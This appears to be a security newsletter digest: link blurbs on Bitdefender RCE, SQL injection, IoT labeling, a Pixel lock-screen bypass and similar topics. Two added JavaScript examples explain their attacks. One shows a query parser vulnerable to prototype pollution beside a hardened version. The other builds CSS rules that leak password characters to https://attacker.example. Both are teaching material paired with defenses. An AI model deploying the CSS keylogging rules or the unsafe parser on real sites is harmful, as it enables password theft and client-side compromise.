Seclog - 2
seclog's spotlight: Client-side prototype pollution, Manual SQL injection discovery tips, I Shared My Phone Number, Hack The WP and katana released!
seclinks
Exploiting Bitdefender Antivirus: RCE from any website | Almost Secure
One thing shouldn’t go unmentioned: security-wise Bitdefender Antivirus is one of the best antivirus products I’ve seen so far, at least in the areas that I looked at.
Cyber-Bookmarks | A list of bookmarks I have used since I started my journey in cyber security
A list of bookmarks
Client-side prototype pollution | Web Security Academy
Prototype pollution is a JavaScript vulnerability that enables an attacker to add arbitrary properties to global prototypes, which may then be inherited by user-defined objects.
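As an added example (not code from the Web Security Academy page), the typical client-side source is a URL-parameter parser that recursively merges keys into an object, so a query such as `?__proto__[isAdmin]=1` walks into `Object.prototype` and every object created afterwards inherits `isAdmin`. The parser below is shown in its vulnerable form beside a hardened one; the function names and the sample query string are constructed for this illustration.

```javascript
// Added example, not code from the Web Security Academy page.
// A query-string parser of the kind found in many client-side libraries,
// first vulnerable to prototype pollution, then hardened.

const BLOCKED_KEYS = new Set(['__proto__', 'constructor', 'prototype']);

// Splits "a[b][c]" into ["a", "b", "c"].
function keyPath(rawKey) {
  return decodeURIComponent(rawKey).split(/\[|\]/).filter(Boolean);
}

// Vulnerable: descends into whatever property the key names, including the
// inherited "__proto__" accessor, so "?__proto__[isAdmin]=1" ends up writing
// Object.prototype.isAdmin = "1".
function parseQueryUnsafe(query) {
  const out = {};
  for (const pair of query.replace(/^\?/, '').split('&')) {
    if (!pair) continue;
    const [rawKey, rawVal = ''] = pair.split('=');
    const path = keyPath(rawKey);
    let node = out;
    for (const key of path.slice(0, -1)) {
      if (typeof node[key] !== 'object' || node[key] === null) node[key] = {};
      node = node[key];
    }
    node[path[path.length - 1]] = decodeURIComponent(rawVal);
  }
  return out;
}

// Hardened: parameters naming a dangerous key are dropped entirely, the result
// is built from null-prototype objects (no inherited "__proto__" accessor to
// walk into), and only own properties are descended into.
function parseQuerySafe(query) {
  const out = Object.create(null);
  for (const pair of query.replace(/^\?/, '').split('&')) {
    if (!pair) continue;
    const [rawKey, rawVal = ''] = pair.split('=');
    const path = keyPath(rawKey);
    if (path.some((k) => BLOCKED_KEYS.has(k))) continue;
    let node = out;
    for (const key of path.slice(0, -1)) {
      const own = Object.prototype.hasOwnProperty.call(node, key);
      if (!own || typeof node[key] !== 'object' || node[key] === null) {
        node[key] = Object.create(null);
      }
      node = node[key];
    }
    node[path[path.length - 1]] = decodeURIComponent(rawVal);
  }
  return out;
}

// Runs the constructed attack query through a parser and reports whether an
// unrelated object created afterwards inherited the attacker's property.
function demonstrate(parser) {
  const query = '?__proto__[isAdmin]=1&theme=dark'; // constructed attacker input
  const cfg = parser(query);
  const victim = {}; // unrelated object, created after parsing
  const polluted = victim.isAdmin === '1';
  delete Object.prototype.isAdmin; // undo the pollution so later code is unaffected
  return { polluted, theme: cfg.theme };
}
```

The hardened parser keeps the legitimate `theme=dark` parameter while refusing the `__proto__` path. The pollution only becomes exploitable through a gadget: page code that reads a property such as a script URL or an HTML snippet off an object it never explicitly set, which is how client-side prototype pollution is typically escalated to DOM XSS.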
AutoRegex: Convert from English to RegEx with Natural Language Processing
Regex is difficult for the average human to write and comprehend.
Play with Radare2!
An introduction to DevSecOps from a fallen comrade who wishes to remain anonymous.
A dive into Iranian Hacking Groups - Cyberwarzone
The Iranian Ajax Security Team performed cyberattacks to identify Iranian users who were using anti-censorship technology.
Manual SQL injection discovery tips
According to bugbountyforum.com's AMA format, one of the most popular questions is "How do you test for Server Side vulnerabilities such as SQLi?".
Google Online Security Blog: Our Principles for IoT Security Labeling
IoT product labeling - the definition of labeling, what labeling needs to convey in terms of security and privacy, where the label should reside, and how to achieve consumer acceptance, are still open for debate.
Tell HN: A hacker's life is in danger, your awareness may be life saving
In Iran, he is one of the most famous people active in the field of programming and computer education.
Data exfiltration via CSS properties such as background-image is possible, as you can see in the following link: https://github.com/maxchehab/CSS-Keylogging/
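As an added example (not code from the linked repository), the stylesheet built below has the shape of rule that technique relies on: one CSS attribute selector per character, each with a background-image pointing at an attacker-controlled URL that encodes the matched character, so the browser's resource fetch leaks the last character of the field. Attribute selectors match the element's `value` attribute, not the live property, so native typing into a plain form does not trigger them; frameworks that write the value back into the attribute do. The origin `https://attacker.example` and the helper names are constructed for this illustration.

```javascript
// Added example, not code from the CSS-Keylogging repository.
// Builds the per-character exfiltration rules and simulates which request a
// browser would issue for a given value attribute.

const CHARSET = 'abcdefghijklmnopqrstuvwxyz0123456789';

// One rule per character: when the password input's value *attribute* ends
// with that character, the rule applies and its background-image is fetched
// from the attacker's origin with the character encoded in the path.
function buildExfilCss(exfilOrigin, charset = CHARSET) {
  return [...charset]
    .map(
      (ch) =>
        `input[type="password"][value$="${ch}"] { ` +
        `background-image: url("${exfilOrigin}/${encodeURIComponent(ch)}"); }`
    )
    .join('\n');
}

// Mirrors what the selector engine does for [value$="..."]: the first rule
// whose suffix matches the current attribute value fires, and the URL in its
// background-image is requested. Returns null when no rule matches (for
// example, a character outside the attacker's charset).
function leakedUrl(css, attributeValue) {
  const rule = /\[value\$="([^"]+)"\]\s*\{\s*background-image:\s*url\("([^"]+)"\)/g;
  for (const m of css.matchAll(rule)) {
    if (attributeValue.endsWith(m[1])) return m[2];
  }
  return null;
}

// Replays a sequence of attribute values (what a framework would write as the
// user types) and collects the characters the attacker's server would observe.
function replayTyping(css, snapshots) {
  return snapshots
    .map((v) => leakedUrl(css, v))
    .filter((u) => u !== null)
    .map((u) => decodeURIComponent(u.slice(u.lastIndexOf('/') + 1)))
    .join('');
}
```

The fetch that carries each character is an ordinary image load, so a `Content-Security-Policy` with a restrictive `img-src` directive blocks it; that, rather than trying to sanitize attribute selectors out of third-party CSS, is the practical defense against this class of exfiltration.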
I Shared My Phone Number. I Learned I Shouldn’t Have. - The New York Times
Our personal tech columnist asked security researchers what they could find out about him from just his cellphone number.
Azure Active Directory – Security Overview | Marius Sandbu
After working with Azure AD for a looong time I always forget how complex it has gotten over the years, with all the new features and capabilities that have been introduced.
First impressions of Bluesky's AT Protocol
A few years ago Twitter's Jack Dorsey announced a project called Bluesky, which was intended to design and build such a system.
Lessons Learned from Cloning Windows Binaries and Code Signing Implants - Hack.Learn.Share
All the lessons I’m sharing here are based on what I learned/observed during my experiment.
A Cypherpunk's Manifesto
File encryption service
Hack The WP – all-in-one security extension for wp-cli
Single-command WordPress security!
The Importance of DevSecOps in Blockchain, Decentralized Protocols, and Applications | F5 Blog
Security has always been one of the most important aspects of information technology, and today many organizations and their developers adopt a security-first mindset when building applications.
WTFPL – Do What the Fuck You Want to Public License
The WTFPL is a very permissive license for software and other scientific or artistic works that offers a great degree of freedom. In fact, it is probably the best license out there.
KICS - Keeping Infrastructure as Code Secure
Keeping Infrastructure as Code Secure (KICS) is an open-source solution for static code analysis of Infrastructure as Code.
2022 Conference Roundup - Google Next, Microsoft Ignite and Oracle Cloud World - Chris Farris
4 books every cybersecurity startup founder needs to read (and 15 more that can be helpful)
I believe there are only a few books that everyone starting a cybersecurity startup should read; the rest will depend on their unique areas of focus and areas of weaknesses, and the company they are building.
Accidental $70k Google Pixel Lock Screen Bypass - bugs.xdavidhu.me
The issue allowed an attacker with physical access to bypass the lock screen protections (fingerprint, PIN, etc.) and gain complete access to the user’s device.